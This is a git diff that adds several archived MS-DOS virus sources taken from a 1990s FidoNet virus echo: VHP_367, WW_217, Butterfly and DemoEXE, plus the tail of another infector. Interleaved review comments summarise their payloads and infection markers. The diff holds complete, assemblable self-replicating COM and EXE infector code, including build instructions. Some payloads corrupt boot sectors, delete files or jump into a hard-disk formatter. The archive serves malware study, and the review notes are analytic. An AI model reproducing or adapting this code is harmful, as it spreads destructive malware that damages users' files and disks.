+ lea dx,[si+offset allp-v_const] + int 21 ; Do it + cmp al,-1 + je drv_xit ; Exit on error + + mov ah,13 ; Delete all *.BAK files too + lea dx,[si+offset allbak-v_const] + int 21 ; Do it + + jmp drv_xit ; Done. Exit + +namaddr dw ? ; Address of the file name buffer + +infect: + mov [si+offset namaddr-v_const],dx ; Save file name address + + mov ax,4301 ; Reset all file attributes + xor cx,cx + int 21 ; Do it + jnc inf_cont ; Continue if all OK +inf_xit: + ret ; Otherwise exit + +inf_cont: + mov ax,3D02 ; Open file for both reading and writing + int 21 + jc inf_xit ; Exit on arror + mov bx,ax ; Save file handle in BX + + mov cx,4 ; Read the first 4 bytes of the file + mov ah,3F + lea di,[si+offset first4-v_const] ; Save them in first4 + mov dx,di + int 21 ; Do it + jc quit ; Exit on error + + cmp byte ptr [di+3],0CA ; File already infected? 
+ stc ; Set CF to indicate it + jz quit ; Don't touch this file if so + + mov cx,[si+offset fsize-v_const] + cmp cx,2048d ; Check if file size >= 2048 bytes + jb quit ; Exit if not + cmp cx,64000d ; Check if file size <= 64000 bytes + stc ; Set CF to indicate it + ja quit ; Exit if not + + xor cx,cx ; Seek to file end + xor dx,dx + mov ax,4202 + int 21 ; Do it + push ax ; Save file size on stack + jc quit ; Exit on error + +; Write the virus body after the end of file: + + mov cx,v_end-v_start + nop + lea dx,[si+offset v_start-v_const] + mov ah,40 + int 21 ; Do it + jc quit ; Exit on error + pop ax ; Restore file size in AX + +; Form a new address for the first JMP instruction in AX: + + add ax,v_entry-v_start-3 + mov byte ptr [di],0E9 ; JMP opcode + mov [di+1],ax + mov byte ptr [di+3],0CA ; Set the "file infected" sign + + xor cx,cx ; Seek to file beginning + xor dx,dx + mov ax,4200 + int 21 ; Do it + jc quit ; Exit on error + + mov cx,4 ; Write the new first 4 bytes of the file + mov dx,di + mov ah,40 + int 21 ; Do it + +quit: + pushf ; Save flags + + mov ax,5701 ; Set file date & time + mov cx,[si+offset time-v_const] ; Get time from mydta + mov dx,[si+offset date-v_const] ; Get date from mydta + int 21 ; Do it + + mov ah,3E ; Close the file + int 21 + + mov ax,4301 ; Set file attributes + mov cl,[si+offset attrib-v_const] ; Get them from mydta + xor ch,ch + mov dx,[si+offset namaddr-v_const] ; Point to file name + int 21 ; Do it + + popf ; Restore flags + ret + +v_end equ $ + +code ends + end start + +;-+- CrossPoint v3.02 +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/i Initialize all segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir57.asm b/MSDOS/Virus.MSDOS.Unknown.vir57.asm new file mode 100644 index 00000000..3d0e64d2 --- /dev/null 
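Review bot: The Bontchev header block records provenance but not the sample's behaviour, and this one has a destructive payload that belongs at the top for anyone triaging it: `inf_drive` reads sector 0 of every drive up to `maxdrv` with `int 25`, increments its first byte (`inc byte ptr [bx]`) and writes it back with `int 26` unless the second byte is 6Fh, and `no_more` deletes `*.P*` and `*.BAK` through the FCB delete call (`mov ah,13`) once that boot-sector byte, held at `v_end`, has been incremented up to 'Z'. A summary line such as `; Payload: corrupts byte 0 of each drive's boot sector on every run; deletes *.P* and *.BAK in the current directory once that byte reaches 'Z'` above `v_entry` would make this explicit. The infection marker is likewise documented only inline — the host's 4th byte is 0CAh (`cmp byte ptr [di+3],0CA`) and only COM files between 2048 and 64000 bytes are touched — and that is the indicator worth stating in the header.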
+++ b/MSDOS/Virus.MSDOS.Unknown.vir57.asm 
@@ -0,0 +1,312 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 47 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : V_VHP367.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 17:55) +;* To : Adam Happ +;* Subj : V_VHP367.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org + page ,132 + name VHP_367 + title Virus; based on the famous VHP-648 virus + .radix 16 + +code segment + assume cs:code,ds:code + + org 100 + +environ equ 2C + +newjmp equ 7Bh ;Code of jmp instruction +codeptr equ 7A ;Here is formed a jump to the virus code +pname equ 78 ;Offset of file name in the dir path +poffs equ 76 ;Offset in the contents of the `PATH' variable +errhnd equ 74 ;Save place for the old error handler +fname equ 70 ;Path name to search for +mydta equ 2C ;DTA for Find First/Next: +attrib equ 17 ;File attribute +time equ 16 ;File time +date equ 14 ;File date +fsize equ 12 ;File size +namez equ 0E ;File name found + +start: + jmp short virus + nop + int 20 + +data label byte ;Data section +saveins db 3 dup (90) ;Original first 3 bytes +allcom db '*.COM',0 ;Filespec to search for +pathstr db 'PATH=' + +;This replaces the first instruction of a destroyed file. 
+;It's a jmp instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,6,0,0,0C8 + +virus: + mov di,offset start ;Push the program true start address + push di ; onto the stack + push ax ;Save AX + + call self ;Detrmine the virus start address + nop ;For those looking for the E80000 pattern +self: + pop bx + sub bx,self-data-1 ;Keep bx pointed at data + cld + lea si,[bx+saveins-data] ;Original instruction saved there + movsw ;Move 2 + 1 bytes + movsb + mov si,bx ;Keep SI pointed at data + + lea bp,[bx+endcode-data+7A] ;Reserve local storage + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + + mov [bp-errhnd],bx + mov [bp-errhnd+2],es + + mov ah,25 ;Set interrupt 24h handler + lea dx,[si+handler-data] + cmp al,0 ;DOS < 2.0 zeroes AL + je exit ;Exit if version < 2.0 + push ds + int 21 + + lea dx,[bp-mydta] + mov ah,1A ;Set DTA + int 21 + + push si ;Save SI + mov es,ds:[environ] ;Environment address + xor di,di ;Point ES:DI at the environment start + mov bx,si + mov al,0 ;0 means end of an enveronment variable +search: ;Search 'PATH' in the environment + lea si,[bx+pathstr-data] + mov cx,5 ;5 letters in 'PATH=' + repe cmpsb + je pfound ;PATH found, continue + mov ch,80 ;Maximum 32 K in environment + repne scasb ;If not, skip through next 0 + cmp al,es:[di] ;End of environment? + jne search ;If not, retry + xor di,di ;0 indicates no PATH found +pfound: + pop si ;Restore SI & ES + pop es + + mov [bp-poffs],di ;Save 'PATH' offset in poffs + lea di,[bp-fname] + mov [bp-pname],di + +filesrch: + lea si,[bx+allcom-data] + movsw + movsw ;Move '*.COM' at fname + movsw + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + lea dx,[bp-fname] + mov cl,11b ;Hidden, Read/Only or Normal files + jmp short findfile + +checkfile: + mov al,[bp-time] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? 
+ +;If so, file is already contains the virus, search for another: + + je findnext + +;Is 10 <= file_size <= 64,000 bytes? + + sub word ptr [bp-fsize],10d + cmp [bp-fsize],64000d-10d+1 + jc process ;If so, process the file + +findnext: ;Otherwise find the next file + mov ah,4F ;Find next file +findfile: + int 21 + jnc checkfile ;If found, go chech some conditions + +nextdir: + mov si,[bp-poffs] ;Get the offset in the PATH variable + or si,si ;0 means end of PATH + jnz skip2 + +olddta: + push ds ;Save DS + mov ax,2524 ;Set interrupt 24h handler + lds dx,dword ptr [bp - errhnd] + int 21 + pop ds ;Restore DS + +exit: + mov ah,1A ;Set DTA + mov dx,80 ;Restore DTA + int 21 + + pop ax + ret ;Go to CS:IP by doing funny RET + +skip2: + push ds ;Save DS + lea di,[bp-fname] ;Point ES:DI at fname + mov ds,ds:[environ] ;Point DS:SI at the PATH variable found +cpydir: + lodsb ;Get a char from the PATH variable + cmp al,';' ;`;' means end of directory + je enddir + cmp al,0 ;0 means end of PATH variable + je endpath + stosb ;Put the char in fname + jmp cpydir ;Loop until done +endpath: + xor si,si ;Zero SI to indicate end of PATH +enddir: + pop ds ;Restore DS + mov [bp-poffs],si ;Save the new offset in the PATH variable + mov al,'\' ;Add '\' + stosb + mov [bp-pname],di + jmp filesrch ;And go find the first *.COM file + +process: + mov di,[bp-pname] + lea si,[bp-namez] ;Point SI at namez +cpyname: + lodsb ;Copy name found to fname + stosb + cmp al,0 + jne cpyname + mov si,bx ;Restore SI + + mov ax,4301 ;Set file attributes + call clr_cx_dos + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jc oldattr ;Exit on error + mov bx,ax ;Save file handle in BX + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? 
+ jnz infect ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting an illegal JMP as a first instruction: + + mov cx,5 ;Write 5 bytes + lea dx,[si+bad_jmp-data] ;Write THESE bytes + jmp short do_write ;Do it + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +infect: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + lea dx,[si+saveins-data] ;Put them there + call dos_rw + jc oldtime ;Exit on error + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + call clr_dx_cx_dos + + add ax,virus-data-3 ;Add virus data length to get code offset + mov [bp-codeptr],ax ;Save result in codeptr + + mov cx,endcode-data ;Virus code length as bytes to be written + mov dx,si ;Write from data to endcode + call dos_write ;Write to file handle + jc oldtime ;Exit on error + + call lseek ;LSEEK to the beginning of the file + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov cl,3 ;3 bytes to write + lea dx,[bp-newjmp] ;Write THESE bytes +do_write: + call dos_write ;Write to file handle + +oldtime: + mov dx,[bp-date] ;Restore file date + mov cx,[bp-time] ; and time + or cl,11111b ;Set seconds to 62 (the virus' marker) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[bp-attrib] ;They were saved in attrib + and cx,3F + lea dx,[bp-fname] + int 21 ;Do it + jmp olddta ;And exit + +lseek: + mov ax,4200 ;LSEEK from the beginning of the file +clr_dx_cx_dos: + xor dx,dx ;From the very beginning +clr_cx_dos: + xor cx,cx ;Auxiliary entry point + db 3Dh ;Trick +dos_write: + mov ah,40 ;Write to file handle +dos_rw: + int 21 + jc dos_ret ;Exit on error + cmp ax,cx ;Set CF if AX < CX +dos_ret: + ret + +handler: ;Critical error handler + mov al,0 ;Just ignore the error + iret ; and return + + db 0E9 ;The JMP opcode + +endcode label byte + +code ends + end start + 
+;-+- GEcho 1.10+ +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/d Warn if duplicate symbols in libraries +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir58.lst b/MSDOS/Virus.MSDOS.Unknown.vir58.lst new file mode 100644 index 00000000..60dad183 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir58.lst 
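Review bot: The header names the VHP-648 ancestry but not the destructive branch, which deserves a line above `start` for anyone triaging this sample: when the system-time seconds are a multiple of 8 (`and dh,111b` with `jnz infect` falling through), the host's first 5 bytes are overwritten with `bad_jmp`, a far jump to 0C800:0006 which the listing's own comment identifies as the XT hard-disk formatter, instead of being infected. The infection marker is the file timestamp's seconds field forced to 62 (`or cl,11111b` before `mov ax,5701`) and re-checked in `checkfile`, and `handler` swallows INT 24h critical errors (`mov al,0` / `iret`), so write failures during infection never surface to the user. A header summary like `; Marker: timestamp seconds == 62; payload: 1-in-8 chance the host's first 5 bytes become JMP C800:0006 (XT ROM format entry)` would capture both.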
@@ -0,0 +1,180 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 48 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : WW_217.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 17:55) +;* To : Adam Happ +;* Subj : WW_217.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org +; new virus obtained from Marek Filipiak 1990-10-05 +; +; dissasembled by Andrzej Kadlof +; + + 0100 E90200 jmp 0105 + +; 0103 00F0 add al,dh + +;========================= +; virus main entry point + + 0105 E8BC00 call 01C4 ; set SI to start of virus code + + 0108 56 push si + +; restore main COM file + + 0109 81C6D201 add si,01D2 ; 3 oryginal bytes of victim + 010D BF0001 mov di,0100 + 0110 B90300 mov cx,0003 + 0113 F3A4 rep movsb + + 0115 5E pop si + 0116 B44E mov ah,4E ; find first + 0118 BAC901 mov dx,01C9 ; address of *.COM,0 in virus + 011B 01F2 add dx,si ; in memory + 011D B9FFFF mov cx,FFFF ; all posible atributes + 0120 CD21 int 21 + + 0122 723D jb 0161 ; no more files, return to main file + + 0124 52 push dx + 0125 B8023D mov ax,3D02 ; open file for read write + 0128 BA9E00 mov dx,009E ; DS:DX ASCIIZ file name + 012B CD21 int 21 + + 012D 722B jb 015A ; error + + 012F 8BD8 mov bx,ax ; store file handle + 0131 8B0E9C00 mov cx,[009C] ; file length in DTA + 0135 8B169A00 mov dx,[009A] + 0139 83EA02 sub dx,0002 ; move file pointer back two bytes + 013C B80142 mov ax,4201 + 013F CD21 int 21 + + 0141 BAD501 mov dx,01D5 ; buffer in virus body + 0144 01F2 add dx,si ; in memory + 0146 B90200 mov cx,0002 ; number of bytes + 0149 B43F mov ah,3F ; read file + 014B CD21 int 21 + + 014D 8B84D501 mov ax,[si+01D5] ; readed 2 bytes + 0151 3D5757 cmp ax,5757 ; WW virus sygnature + 0154 7510 jne 0166 ; file not infected + + 0156 B43E 
mov ah,3E ; close file + 0158 CD21 int 21 + + 015A 5A pop dx ; restore DTA + 015B B44F mov ah,4F ; find next + 015D CD21 int 21 + + 015F 73C3 jnb 0124 ; check file + +; return to main file + + 0161 BB0001 mov bx,0100 + 0164 FFE3 jmp bx + +;--------------- +; infect file + + 0166 A19A00 mov ax,[009A] ; file length + 0169 2D0300 sub ax,0003 ; starting adres in infected file + 016C 8984D001 mov [si+01D0],ax ; form JMP nnnn instruction + 0170 E83E00 call 01B1 ; move file pointer at the beginning + + 0173 BAD201 mov dx,01D2 ; buffer for first 3 bytes of victim + 0176 01F2 add dx,si ; in memory + 0178 B90300 mov cx,0003 ; number of bytes + 017B B43F mov ah,3F ; read file + 017D CD21 int 21 + + 017F E82F00 call 01B1 ; move file pointer at the begining + + 0182 BACF01 mov dx,01CF ; address of new starting bytes + 0185 01F2 add dx,si ; in memory + 0187 B90300 mov cx,0003 ; number of bytes + 018A B440 mov ah,40 ; write to file + 018C CD21 int 21 + + 018E E82500 call 01B6 ; move file pointer at the end of file + + 0191 8BD6 mov dx,si + 0193 81C20001 add dx,0100 ; virus code in memory + 0197 B9D900 mov cx,00D9 ; virus length + 019A B440 mov ah,40 ; write to file + 019C CD21 int 21 + + 019E B80157 mov ax,5701 ; set time/date file stamp + 01A1 8B0E9600 mov cx,[0096] ; restore from DTA + 01A5 8B169800 mov dx,[0098] + 01A9 CD21 int 21 + + 01AB B43E mov ah,3E ; close file + 01AD CD21 int 21 + + 01AF EBB0 jmp 0161 ; jump to main file + +;------------------------------------------------- +; move file pointer to the beginning of the file + + 01B1 B000 mov al,00 + 01B3 EB06 jmp 01BB + 01B5 90 nop + +;-------------------------------------- +; move file pointer to the end of file + + 01B6 B002 mov al,02 + 01B8 EB01 jmp 01BB + 01BA 90 nop + + 01BB B442 mov ah,42 + 01BD 31C9 xor cx,cx + 01BF 31D2 xor dx,dx + 01C1 CD21 int 21 + + 01C3 C3 ret + +;---------------------------------------------------- +; find address of first byte of virus code in memory + + 01C4 8BEC mov bp,sp + 01C6 8B7600 
mov si,[bp] + 01C9 81EE0301 sub si,0103 + 01CD C3 ret + +;---------------- +; working area + + 01CE 2A 2E 43 4F 4D 00 ; *.COM, 0 + 01D4 E9 02 00 ; new first 3 bytes for victim + 01D7 EA F0 FF ; oryginal first 3 byte of victim + 01DA 00 F0 ; buffer for last 2 bytes of inspected file + 01DC 57 57 ; virus sygnature WW + +;-+- DinoMail v.1.0 Alpha +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/w-xxx,/w+xxx Disable (-) or enable (+) warning xxx +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir61.asm b/MSDOS/Virus.MSDOS.Unknown.vir61.asm new file mode 100644 index 00000000..50c5dbd6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir61.asm 
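Review bot: This file is a hand-annotated debug listing (address, opcode bytes, mnemonic) rather than assembler source, so unlike its siblings it cannot be rebuilt; the `.lst` extension is right, but a one-line note under the `dissasembled by` credit saying `; debug-style listing, not assemblable source` would stop a reader from trying. The indicators are spread through the working-area comments: the last two bytes of an infected file are 5757h (`cmp ax,5757 ; WW virus sygnature`), the body written is 0D9h (217) bytes, matching the WW_217 subject, and it walks `*.COM` in the current directory only with `mov cx,FFFF` for all attributes.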
@@ -0,0 +1,218 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 51 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : BUTTRFLY.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56) +;* To : Fred Lee +;* Subj : BUTTRFLY.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org +Comment| +************************************************************************ + Virus Name: Butterfly Virus + Effective Length: 302 bytes + Disassembled by Silent Death - 1993 + + Notes: + - Non-Resident .COM appender + - infects up to 4 files in the current directory + - infected files have 01h as the 4th byte + - ok virus to learn off of but a lot of wasteful code + + To Compile: [Byte matchup!] + TASM /m File.asm + TLINK /t FILE.obj +************************************************************************| + + .model tiny + .code + org 100h + +start: + jmp virus + nop + nop + +oldjmp db 0cdh ; int 20h +newjmp db 20h + db 90h ; nop +id db 1 ; infection marker + +virus: + call delta ; get delta offset +delta: + pop bp + sub bp,10Bh ; adjust delta offset + + mov di,100h ; move bytes to the start + lea si,[bp+oldjmp] ; original starting + mov cx,4 ; move four bytes + cld ; clear direction flag + rep movsb ; move the bytes + + mov ah,1Ah ; set dta + lea dx,[bp+dta] ; set into heap + int 21h + + mov byte ptr [bp+offset counter],0 ; reset counter + + mov ah,4Eh ; find first asciiz file + lea si,[bp+dta+1eh] ; points to fname in dta + lea dx,[bp+fspec] ; files to find (*.COM) + push dx ; save file spec + jmp short findfiles + +returntohost: + mov ah,1Ah ; set dta + mov dx,80h ; to original position + int 21h + + xor ax,ax ; clear all registers + xor bx,bx ; no real need to + xor cx,cx + xor dx,dx + xor si,si + xor di,di + 
mov sp,0FFFEh ; adjust stack pointer + mov bp,100h ; return to here + push bp + xor bp,bp ; clear this + retn ; return to host + +closeup: + or bx,bx ; is handle 0? + jz findnext ; yup so don't bother closing + + mov ch,0 ; get attributes + mov cl,[bp+dta+15h] ; theres no point! + + mov ax,5701h ; set files date/time + mov cx,word ptr [bp+dta+16h]; get original time + mov dx,word ptr [bp+dta+18h]; get original date + int 21h + + mov ah,3Eh ; close file + int 21h + xor bx,bx ; delete handle + +findnext: + mov ah,4Fh ; find next file + +findfiles: + pop dx ; get filespec + push dx + mov cx,7 ; all attributes + xor bx,bx ; make sure no handle + int 21h + + jnc infect ; jump if file found + jmp returntohost2 ; no files found then quit + +vname db 0FFh + db 'Goddamn Butterflies' ; YA Know! + db 0FFh + +infect: + mov dx,si ; dx => fname in dta + + mov ax,3D02h ; open file read/write + int 21h + jc closeup ; if error close up, get another + mov bx,ax ; handle to bx + + mov ah,3Fh ; read from file + mov cx,4 ; four bytes + lea dx,[bp+oldjmp] ; save here + int 21h + + mov ax,word ptr [bp+dta+23h]; get end of filename + cmp ax,444Eh ; is file command.com? + je closeup ; yup so leave it + + cmp [bp+id],1 ; is file infected? + je closeup ; yup so leave it + + mov ax,word ptr [bp+dta+1ah]; get file size + cmp ax,121 ; is file smaller than 121? 
+ jb closeup ; if it is leave it + + mov ax,4202h ; file pointer to end + cwd + xor cx,cx + int 21h + + cmp ax,64768 ; is file to big to infect + ja closeup ; if above then jump + + mov [bp+data],ax ; save file size + + lea dx,[bp+oldjmp] ; buffer to write from + mov cx,4 ; 4 bytes + mov ah,40h ; write oldjmp to end of file + int 21h + + lea dx,[bp+virus] ; start of virus + mov cx,12Ah ; write virus (298) to end + mov ah,40h ; write to file + int 21h + + mov ax,4200h ; file pointer to start + cwd + xor cx,cx + int 21h + + mov ax,[bp+data] ; get the file size + inc ax ; increment the file size + mov word ptr [bp+newjmp],ax ; save the new jump + mov [bp+oldjmp],0E9h ; new jump + mov [bp+id],1 ; infection marker + + lea dx,[bp+oldjmp] ; new jump + mov ah,40h ; write new start + mov cx,4 ; four bytes + int 21h + + inc [bp+counter] + cmp [bp+counter],4 ; has 4 files been infected? + jae returntohost3 ; yup so return to host + jmp closeup ; close current file + +returntohost2: ; This is a total waste! + mov di,100h ; start of file + cmp word ptr [di],20CDh ; are we the original + je returntohost3 ; yup + +returntohost3: + jmp returntohost + +fspec db '*.COM',0 ; files to find + +dta db 43 dup (0) ; holds dta +counter db 0 ; holds file counter +data dw 0 ; holds new jump offset + + end start + +;-+- Concord/QWK O.O1 Beta-7 +; + Origin: Data Fellows BBS (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir62.asm b/MSDOS/Virus.MSDOS.Unknown.vir62.asm new file mode 100644 index 00000000..55bb7f28 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir62.asm 
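Review bot: The `Comment|` header is the only one in this batch that states length, marker and scope up front, but it omits the host filters the code applies: `cmp ax,444Eh` against the last two filename bytes in the DTA skips the file the listing's comment identifies as COMMAND.COM, and the size window is 121 to 64768 bytes (`cmp ax,121` / `cmp ax,64768`). Adding `- skips COMMAND.COM; only hosts of 121-64768 bytes; marker 01h at byte 4` to the Notes list would make the header complete for an analyst.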
@@ -0,0 +1,219 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 52 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : DEMOEXE.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 17:58) +;* To : Clif Jessop +;* Subj : DEMOEXE.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org + .model tiny ; Handy TASM directive + .code ; Virus code segment + org 100h ; COM file starting IP + ; Cheesy EXE infector + ; Written by Dark Angel of PHALCON/SKISM + ; For 40Hex Number 8 Volume 2 Issue 4 + id = 'DA' ; ID word for EXE infections + + startvirus: ; virus code starts here + call next ; calculate delta offset + next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw + movsw + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + lea dx,[bp+exe_mask] + mov ah,4eh ; find first file + mov cx,7 ; any attribute + findfirstnext: + int 21h ; DS:DX points to mask + jc done_infections ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe + find_next: + mov ah,4fh ; find next file + jmp short findfirstnext + done_infections: + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + pop es + pop ds ; DS->PSP + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[si+jmpsave+2],ax + add ax,word ptr cs:[si+stacksave+2] + cli ; Clear intrpts for stack manip. 
+ mov sp,word ptr cs:[si+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo + jmpsave dd ? ; Original CS:IP + stacksave dd ? ; Original SS:SP + jmpsave2 dd 0fff00000h ; Needed for carrier file + stacksave2 dd ? + + creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0 + virusname db '[DemoEXE] for 40Hex',0 + + infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-startvirus ; add virus size + adc dx, 0 + + mov cl, 9 ; 2**9 = 512 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax ; filesize in pages + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + mov cx, 1ah + finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,40h ; Concatenate virus + lea dx,[bp+startvirus] + mov cx,heap-startvirus ; # bytes to write + int 21h + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + 
mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + mo_infections: jmp find_next + + open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + + attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + + exe_mask db '*.exe',0 + heap: ; Variables not in code + newDTA db 42 dup (?) ; Temporary DTA + buffer db 1ah dup (?) ; read buffer + endheap: ; End of virus + + end startvirus + +;-+- CrossPoint v3.02 +; + Origin: Data Fellows BBS (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/i Initialize all segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir63.asm b/MSDOS/Virus.MSDOS.Unknown.vir63.asm new file mode 100644 index 00000000..fcdf9f81 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir63.asm 
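Review bot: The only description is three comment lines inside the code (`; Cheesy EXE infector`), and the header-field manipulation that identifies an infected EXE is buried in `infect_exe`: the initial-SP word at EXE header offset 10h is replaced by the `id` word `'DA'` (`mov word ptr [bp+buffer+10h], id`), which is also what `checkEXE` tests, so an EXE whose initial-SP field reads as that word is the on-disk indicator. Entry CS:IP and the initial SS are redirected to the appended body with the originals kept in `jmpsave2`/`stacksave2`, and the size fields at offsets 2 and 4 are recomputed in 512-byte pages. A leading block such as `; Archived sample: DemoEXE (40Hex #8), appending EXE infector; marker: EXE header initial-SP word == 'DA'` would save the next reader that trace.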
@@ -0,0 +1,222 @@
+; PVT.VIRII (2:465/65.4) PVT.VIRII
+; Msg : 53 of 54
+; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
+; To : - *.* - Fri 11 Nov 94 08:10
+; Subj : KOD4_399.ASM
+;
+;.RealName: Max Ivanov
+;
+;* Kicked-up by MeteO (2:5030/136)
+;* Area : VIRUS (Int: p p)
+;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 17:58)
+;* To : Mikko Hypponen
